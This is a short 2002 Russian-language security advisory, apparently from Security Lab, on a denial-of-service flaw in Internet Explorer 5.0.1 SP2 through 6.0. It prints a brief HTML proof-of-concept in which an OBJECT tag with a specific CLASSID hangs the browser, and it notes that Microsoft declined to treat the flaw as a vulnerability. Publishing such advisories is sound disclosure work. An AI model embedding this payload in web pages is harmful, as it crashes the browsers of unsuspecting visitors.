Security Lab

DoS против Microsoft Internet Explorer

Дата публикации:28.06.2002
Всего просмотров:1137
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Web страница, содержащая определенное значение CLASSID в тэге OBJECT, приведет к зависанию IE. Пример:
 
<!--  start dosIE-doe.html -->
<object ID="dosIE-doe" 
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>
<!-- end dosIE-doe.html -->
Microsoft посчитала что этот недостаток не является уязвимостью защиты и сослалась на собственное определение, что такое уязвимость: http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp

Уязвимость обнаружена в Microsoft Internet Explorer 5.0.1 SP2-6.0

Ссылки: A DoS against IE in W2K and XP? You Make the Call...